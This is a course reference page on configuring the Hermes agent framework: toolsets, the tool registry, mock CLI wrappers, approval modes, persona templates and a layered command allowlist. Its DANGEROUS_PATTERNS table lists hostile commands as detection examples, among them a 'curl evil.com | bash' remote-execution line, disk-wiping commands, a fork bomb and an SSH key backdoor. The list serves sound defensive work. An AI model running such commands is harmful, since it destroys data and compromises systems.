Skip to main content

Reference: Tool Configuration and Safety Setup

Quick-reference for Module 8 — configuring tools and safety boundaries in Hermes.


1. Tool Pattern Comparison

PatternConfig LocationAuth MethodScopeBest For
CLI (terminal)platform_toolsets.cli: [terminal, ...]Environment variables / credential chainShell commandsAWS CLI, kubectl, psql, any CLI tool
MCPconfig.yaml: mcp_servers + platform_toolsets.cli: [mcp, ...]MCP server manages authProtocol-levelShared team tools, multi-AI environments
Mock wrapperPATH manipulation + HERMES_LAB_MODE=mockN/ALab/test onlyLab environments, scenario-based testing

2. Hermes config.yaml Tool Configuration

Platform Toolsets (Primary Control)

The platform_toolsets.cli list in config.yaml is the single most impactful configuration decision — it determines which tool categories the agent can use:

# Domain specialist (Track A, B, or C)
platform_toolsets:
cli: [terminal, file, web, skills]

# Fleet coordinator (no terminal — cannot execute commands directly)
platform_toolsets:
cli: [web, skills]
ToolsetWhat it enables
terminalShell command execution — aws, kubectl, psql, any CLI tool
fileRead and write files in the agent's working context
webWeb search and URL fetching
skillsSkills discovery (skills_search tool)
mcpAll tools from connected MCP servers
memoryCross-session memory storage/retrieval
delegateSubagent delegation (delegate_task) — coordinators only

A tool not in the enabled toolsets is not passed to the LLM — the Brain never knows it exists. This is why a coordinator agent with [web, skills] cannot execute shell commands even if it tries: terminal_tool is not in its schema list.

Full config.yaml Reference

model:
default: "anthropic/claude-haiku-4" # which Brain to use
provider: "auto" # auto-detect API client from model identifier

platform_toolsets:
cli: [terminal, file, web, skills] # which tools are available

approvals:
mode: manual # L2: manual approval for DANGEROUS_PATTERNS matches
timeout: 300 # 5 minutes — required for interactive sessions

command_allowlist: [] # pre-approved patterns (empty = nothing permanent; L4 would add entries)

agent:
max_turns: 30 # loop termination limit
verbose: false # suppress intermediate tool output

MCP Server Configuration

mcp_servers:
kubernetes:
transport: stdio
command: "mcp-server-kubernetes"
args: ["--kubeconfig", "${KUBECONFIG}"]
filesystem:
transport: stdio
command: "mcp-server-filesystem"
args: ["--root", "/workspace/logs"]
# Constrains file access to /workspace/logs only

Stdio transport: MCP server runs as a subprocess of the agent process. Same security context. Simpler to set up. Limited to local use.

HTTP SSE transport: MCP server runs as a separate service. Can be remote. Requires authentication. Suitable for shared infrastructure.


3. How tools/registry.py Manages Tool Discovery

The ToolRegistry class in tools/registry.py is a singleton (registry = ToolRegistry() at module level). Each tool file calls registry.register() at import time:

registry.register(
name="terminal_command",
toolset="terminal",
schema={
"name": "terminal_command",
"description": "Execute a shell command...",
"parameters": {
"type": "object",
"properties": {
"command": {"type": "string", "description": "The shell command to execute"}
},
"required": ["command"]
}
},
handler=execute_terminal_command,
check_fn=lambda: shutil.which("bash") is not None,
requires_env=[],
is_async=False,
)

At session startup, model_tools.py imports all tool modules (triggering their register() calls), then calls registry.get_definitions(enabled_tool_names) to retrieve JSON Schemas for the tools whose toolsets match platform_toolsets.cli. These schemas become the tools parameter in every LLM API call.

The check_fn is called before including a tool in the schema list. Tools whose check_fn() returns False are excluded — their name never appears in the LLM's context. This is how environment-dependent tools (requiring specific env vars, binaries, or connectivity) are safely excluded from agents that do not have those prerequisites.

The key insight: the registry separates registration (which tools exist) from availability (which tools are enabled for this agent). The same codebase serves all agents — only platform_toolsets.cli in config.yaml changes which tools are visible.


4. Mock Wrapper Setup Reference

Environment Variable Routing

# Enable mock mode
export HERMES_LAB_MODE=mock
export HERMES_LAB_SCENARIO=messy # or: clean

# Add wrappers to front of PATH
export PATH="$(pwd)/course/infrastructure/wrappers:$PATH"

With these variables set, any call to aws, psql, or kubectl from within the agent resolves to the mock wrapper in course/infrastructure/wrappers/ instead of the real binary.

Mock Banner

Mock wrappers print a visible banner to stderr:

╔══════════════════════════════════════════╗
║ [ MOCK MODE ] ║
║ Data source: pre-baked JSON files ║
║ Set HERMES_LAB_MODE=live for real AWS ║
╚══════════════════════════════════════════╝

This banner serves two purposes: participants can visually confirm they are in mock mode, and agents' SOUL.md includes a rule to "confirm HERMES_LAB_MODE before every session."

HERMES_LAB_MODE is a per-session environment variable (set in the terminal session before launching Hermes) rather than a persistent configuration key. This is intentional: making it persistent (e.g., in ~/.hermes/.env) risks accidentally keeping mock mode active in production use.

Routing Logic Example (mock-aws)

LAB_MODE="${HERMES_LAB_MODE:-live}"
if [[ "$LAB_MODE" != "mock" ]]; then
exec "$(command -v aws)" "$@" # route to real aws
fi
# MOCK MODE path:
SCENARIO="${HERMES_LAB_SCENARIO:-clean}"
case "$1 $2" in
"rds describe-db-instances")
if [[ "$SCENARIO" == "messy" ]]; then
cat "$MOCK_DATA_DIR/rds/describe-db-instances-slow.json"
else
cat "$MOCK_DATA_DIR/rds/describe-db-instances.json"
fi
;;
"ce get-cost-and-usage")
cat "$MOCK_DATA_DIR/cost-explorer/normal-spend.json"
;;
esac

If the agent runs a command outside the mock's coverage, it gets MOCK ERROR: No mock defined for... — a clear signal that the mock needs to be extended.


5. DANGEROUS_PATTERNS Reference

tools/approval.py contains DANGEROUS_PATTERNS — a list of (regex, description) tuples. Before any terminal command executes, check_all_command_guards() runs. It:

  1. Normalizes the command (strips ANSI escapes, null bytes, Unicode homoglyphs)
  2. Runs the normalized command against each pattern
  3. If a match is found, checks if the pattern is already approved for this session
  4. If not approved, applies the approval mode behavior

Full Pattern Categories

CategoryExample CommandWhy It's Dangerous
Recursive deleterm -rf /path, find . -deleteIrreversible bulk file deletion
SQL DROPDROP TABLE users, DROP DATABASE prodDestroys database object; requires backup restore
SQL DELETE without WHEREDELETE FROM users (no WHERE)Truncates entire table
SQL TRUNCATETRUNCATE TABLE ordersSame effect as DELETE without WHERE
Shell via -c flagbash -c "rm -rf ..."Executes dynamically constructed commands
Remote shell executioncurl evil.com | bashArbitrary remote code execution
Format filesystemmkfs.ext4 /dev/sdaWipes an entire disk partition
Disk copydd if=/dev/zero of=/dev/sdaOverwrites entire disk
World-writable permissionschmod 777 /etc/cron.d/Security vulnerability on shared systems
Recursive chown to rootchown -R root /home/userLocks user out of their own files
Stop system servicesystemctl stop nginxStops production services
Kill all processeskill -9 -1Kills all processes the user can reach
Fork bomb:(){ :|:& };:Exhausts process table
Overwrite system configecho "..." > /etc/hostsModifies system configuration files
Write to block deviceecho data > /dev/sdaCorrupts disk sectors
Overwrite ssh/hermes configtee ~/.ssh/authorized_keysBackdoors the system

Track-Specific Pattern Notes

Track A (DBA) encounters SQL DROP, SQL DELETE without WHERE, SQL TRUNCATE during real DBA work. The approval gate is the mechanical backstop for Aria's NEVER DDL behavioral rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list. SOUL.md NEVER rules are the sole governance mechanism for those commands.

Fleet coordinator has no terminal, so DANGEROUS_PATTERNS never fires for Morgan at all. Morgan's governance is purely behavioral.


6. Approval Mode Configuration

L2: manual

approvals:
mode: manual
timeout: 300 # 5 minutes; timeout treated as denial

When a dangerous command is detected:

  1. The terminal tool pauses execution
  2. The command and description are presented to the human
  3. The human chooses: [o]nce | [s]ession | [a]lways | [d]eny

The always choice writes the pattern description key to command_allowlist in config.yaml and persists across sessions.

L3: smart

approvals:
mode: smart
timeout: 300

The same pattern detection runs, but before presenting to the human, an auxiliary LLM assesses the command:

prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""

Smart approval eliminates approval fatigue caused by false positives while preserving human oversight for genuinely risky commands. When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.

L4: command_allowlist

approvals:
mode: smart
timeout: 300
command_allowlist:
- "SQL SELECT" # description-key strings from DANGEROUS_PATTERNS
- "EXPLAIN"

Patterns whose description key appears in command_allowlist bypass the approval gate entirely. At the course level, all agents start with an empty allowlist. Adding entries to the allowlist is a security decision requiring documented rationale.

L1: no terminal

platform_toolsets:
cli: [web, skills] # terminal absent — no commands, no approval gate

At L1, the approval gate never fires because the terminal tool is not available.


7. Safety Configuration Profiles

Read-Only Domain Specialist (L2 — Course Default)

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: manual
timeout: 300

command_allowlist: []

Agent can run diagnostics. Any DANGEROUS_PATTERNS match pauses for human decision. Nothing permanently pre-approved.

Fleet Coordinator (Governance by Design)

platform_toolsets:
cli: [web, skills] # No terminal — coordinator pattern enforced mechanically

approvals:
mode: manual # Still set; defense against misconfiguration
timeout: 300

delegation:
max_iterations: 30
default_toolsets: ["terminal", "file", "web", "skills"] # Grants to spawned specialists

The coordinator has no terminal. Even if its SOUL.md NEVER rules were removed, it still could not execute commands because the terminal tool is not registered in its schema.

Semi-Autonomous Production Agent (L4)

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart
timeout: 300

command_allowlist:
- "SQL SELECT" # Read-only SQL is pre-approved
- "explain analyze" # EXPLAIN ANALYZE is pre-approved
# Populated only after documented L3 track record review

8. SOUL.md Templates

Track A: DBA Specialist (Aria)

# Aria — RDS PostgreSQL Health Specialist

**Role:** Database reliability agent for RDS PostgreSQL performance diagnosis
**Domain:** Track A: Database
**Scope:** PostgreSQL performance diagnostics on AWS RDS. Diagnosis and recommendation ONLY. Parameter changes route through DBA approval workflow.

## Identity

You are Aria, a database reliability agent for DevOps teams running PostgreSQL on AWS RDS. You diagnose performance problems — slow queries, index gaps, parameter drift — and recommend precise fixes. You do not execute changes; you surface findings and propose remediation steps for human approval. Every diagnosis ties an observation to a specific metric or query pattern.

## Behavior Rules

- Run EXPLAIN before recommending any index — never guess at query plans
- Report numeric thresholds: CPUUtilization > 80%, query mean_time > 1000ms, calls > 500/hour
- Present all findings in Observation → Evidence → Recommendation format
- Confirm HERMES_LAB_MODE before every session: state MOCK or LIVE clearly in your first line
- NEVER execute ALTER TABLE, CREATE INDEX, or any DDL without explicit human approval
- NEVER run VACUUM FULL during business hours — acquires exclusive lock, blocks all reads and writes
- NEVER modify max_connections without scheduling a restart — static parameter, change not effective until restart

## Escalation Policy

Escalate to human when:
- CPUUtilization sustained > 90% for 5+ minutes
- pg_stat_statements shows a query with mean_time > 5000ms
- Parameter change requires database restart
- Root cause spans more than one service (possible cross-domain incident)

Always say: "Escalating — this exceeds DBA agent scope. Human review required before proceeding."

Fleet Coordinator (Morgan)

# Morgan — Fleet Coordination Agent

**Role:** Cross-domain incident coordination — route to specialists, synthesize findings
**Domain:** Fleet Coordinator
**Scope:** Incident triage and specialist delegation. NEVER executes domain commands directly.

## Identity

You are Morgan, a fleet coordination agent for cross-domain DevOps incidents. When an incident involves multiple domains (database, cost, Kubernetes), you decompose it into domain-specific tasks and delegate each to the appropriate specialist. You synthesize their findings into a single incident summary. You never run database queries, AWS CLI commands, or kubectl directly — specialists do that work.

## Behavior Rules

- Decompose multi-domain incidents into discrete domain tasks before delegating
- Synthesize specialist findings into a single cross-domain incident view
- NEVER run database queries (SELECT, EXPLAIN, psql) — delegate to track-a
- NEVER run AWS CLI commands — delegate to track-b
- NEVER run kubectl commands — delegate to track-c
- NEVER spawn more than one delegation per domain per incident

## Escalation Policy

Escalate to human when:
- Two or more specialists return CRITICAL diagnosis simultaneously
- Any specialist reports data unavailable (infrastructure access failure)
- Cross-domain root cause requires architectural decision

9. MCP Server Setup Reference

Installing a Local MCP Server

# Kubernetes MCP server
npm install -g @modelcontextprotocol/server-kubernetes

# Filesystem MCP server
npm install -g @modelcontextprotocol/server-filesystem

# Verify server is runnable
mcp-server-kubernetes --help

Testing an MCP Server Manually

# Stdio transport: send a JSON-RPC list request via stdin
echo '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' | mcp-server-kubernetes
# Expected: JSON response listing available tools with their schemas

Debugging MCP Connections in Hermes

hermes -p track-a --mcp-debug
# Outputs MCP protocol messages to stderr for debugging tool discovery and calls

10. Safety Checklist Before Deployment

Before connecting your agent to a real environment:

  • platform_toolsets.cli matches the agent type — domain specialists have terminal; coordinators do not
  • approvals.mode is manual for first deployment — never off for production
  • approvals.timeout is set (300 recommended for interactive sessions)
  • command_allowlist is reviewed — no silent pre-approvals without documented rationale
  • SOUL.md NEVER rules cover the most dangerous domain-specific actions (not just generic AI safety rules)
  • For Track B/C: SOUL.md NEVER rules for aws ec2 terminate-instances and kubectl delete are present and specific — these are not in DANGEROUS_PATTERNS
  • Agent has been tested in mock mode before running against live infrastructure
  • You can name the highest-blast-radius command the agent could run and confirm what governs it (SOUL.md rule, DANGEROUS_PATTERNS, or mechanical toolset restriction)

11. wrapper_allowlist — Course Governance Enforcement

You will see a wrapper_allowlist: key in the course/agents/track-*/config.yaml files and in the governance/governance-L*.yaml reference files. This is not a native Hermes feature. It is a course-local enforcement layer added on top of Hermes to solve a specific problem: Hermes's native command_allowlist only bypasses the approval gate for commands that are already in DANGEROUS_PATTERNS — and kubectl delete, kubectl drain, kubectl cordon, aws ec2 terminate-instances, etc. are NOT in that list.

What problem does it solve?

Track B (FinOps) and Track C (Kubernetes) have destructive commands that Hermes's mechanical approval gate will never fire on. Without the wrapper layer, the only thing stopping a Track C agent from running kubectl delete pod --all is a behavioral NEVER rule in its SOUL.md. Behavioral rules are load-bearing but not mechanical — an LLM can misread or misprioritize them under pressure. The course introduces a second mechanical layer.

How is it implemented?

The infrastructure/wrappers/ directory contains three executable bash scripts:

infrastructure/wrappers/
├── mock-kubectl ← intercepts `kubectl` when this directory is first in PATH
├── mock-aws ← intercepts `aws`
└── mock-psql ← intercepts `psql`

When you export PATH="$(pwd)/infrastructure/wrappers:$PATH" at the start of a lab session, any call to kubectl/aws/psql from the Hermes agent (or your own terminal) resolves to the wrapper script FIRST, not the real binary.

The wrapper runs two checks before forwarding the command:

  1. Mode routing. Reads HERMES_LAB_MODE:

    • mock (default in labs) → serve pre-baked JSON from infrastructure/mock-data/ and never touch the real binary
    • live → pass through to the real kubectl/aws/psql via exec "$(command -v kubectl)" "$@"
  2. Governance pre-flight (added in Phase 7). Reads HERMES_LAB_GOVERNANCE and HERMES_LAB_TRACK, then:

    • Resolves the active governance yaml file (e.g., governance/governance-L2.yaml or governance/governance-L4-track-c.yaml)
    • Parses its wrapper_allowlist.<tool>: subsection using a bash+awk YAML reader (no external dependencies)
    • Checks the incoming command prefix against the allowlist entries
    • Allowed: continues to mode routing step 1
    • Not allowed: prints a loud ╓ GOVERNANCE REJECTED ╖ banner to stderr and exits with code 1 — the real binary is never invoked

Here is a minimal example wrapper_allowlist:

# In agents/track-c-kubernetes/config.yaml
model:
default: "anthropic/claude-haiku-4-5"
provider: "Anthropic"

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: manual
timeout: 300

# Hermes-native bypass (empty — course does not use this mechanism)
command_allowlist: []

# ── Course wrapper enforcement (Phase 7 — NOT a native Hermes feature) ──
# Read by infrastructure/wrappers/mock-kubectl when HERMES_LAB_GOVERNANCE is set.
# The wrapper matches the "${1} ${2}" prefix of the incoming command against these entries.
# Track C uses only the kubectl subsection. Track A uses psql. Track B uses aws.
wrapper_allowlist:
kubectl:
- "get pods"
- "get pod "
- "get nodes"
- "get endpoints"
- "describe pod "
- "describe node "
- "logs "
- "top pods"
- "top nodes"

A Track C agent running under this config can freely execute kubectl get pods and kubectl describe pod my-app, but kubectl delete pod my-app exits immediately with the rejection banner — regardless of what the agent's SOUL.md NEVER rules say or don't say. The mechanical layer is independent of the behavioral layer.

Three-layer defense model

The wrapper_allowlist is one of three independent safety layers. They fire in order for every command:

LayerMechanismFires whenOwns
1. wrapper_allowlistCourse bash wrapper intercepts kubectl/aws/psqlEvery command via the wrapper, alwaysCovers all kubectl/aws/psql commands — including the ones Hermes doesn't know are dangerous
2. DANGEROUS_PATTERNS (Hermes native)tools/approval.py regex match on the command stringOnly when the command matches a built-in pattern (SQL DROP, rm -rf, etc.)Covers generic dangerous patterns across shells
3. SOUL.md NEVER rulesAgent refuses behaviorally based on identity promptsLLM decision at reasoning timeDomain-specific prohibitions the agent enforces in reasoning

Track A (database) is the only track where all three layers fire on DROP TABLE users. Track B/C destructive commands only get Layers 1 and 3 because they are absent from DANGEROUS_PATTERNS — which is exactly why the course adds Layer 1 via the wrapper.

Where do the wrappers come from?

  • Phase 1 shipped the initial mock-kubectl, mock-aws, mock-psql — basic mode routing (mock vs live) with pre-baked JSON fixtures.
  • Phase 6 extended mock-kubectl with 6 new broken-pod scenarios (ImagePullBackOff, CrashLoopBackOff, OOMKilled, liveness probe, missing secret, port mismatch) for K8s diagnostic skills labs.
  • Phase 7 added the wrapper_allowlist pre-flight check to all three wrappers, along with the HERMES_LAB_GOVERNANCE and HERMES_LAB_TRACK env vars and the GOVERNANCE REJECTED banner.

The wrapper code lives in the course repo at infrastructure/wrappers/ — not in Hermes itself. You can cat them to read the exact bash implementation. When you distribute your completed agent profile outside the course, the wrappers don't come with it; consumers of your profile who want the same governance enforcement would need to copy them separately or adopt the same PATH trick.

Env vars the wrappers read

Env VarValuesPurpose
HERMES_LAB_MODEmock | liveMode routing (serve fixtures or pass through to real binary)
HERMES_LAB_SCENARIOclean, messy, crashloop2, oom, image-pull, liveness, missing-secret, port-mismatchWhich mock fixture set to serve in mock mode
HERMES_LAB_GOVERNANCEL1 | L2 | L3 | L4Which governance yaml's wrapper_allowlist is active
HERMES_LAB_TRACKtrack-a | track-b | track-cRequired at L4 to disambiguate the 3 track-specific L4 files
MOCK_DATA_DIRpathLocation of pre-baked JSON fixtures

Every course lab that uses the wrapper layer shows the complete export block for these variables at the top of every major step. If your agent's commands are being unexpectedly allowed or rejected, the first thing to check is whether all the env vars are set in the shell that launched Hermes.

Module 13 is the deep-dive

This section is a summary. Module 13 (Governance and Safety) walks through the complete L1 → L4 progression with hands-on governance level switching, PR-gated allowlist additions, and the audit trail of rejected commands. If you want to understand why the three-layer defense model is necessary rather than just how it's wired, that's the module to read.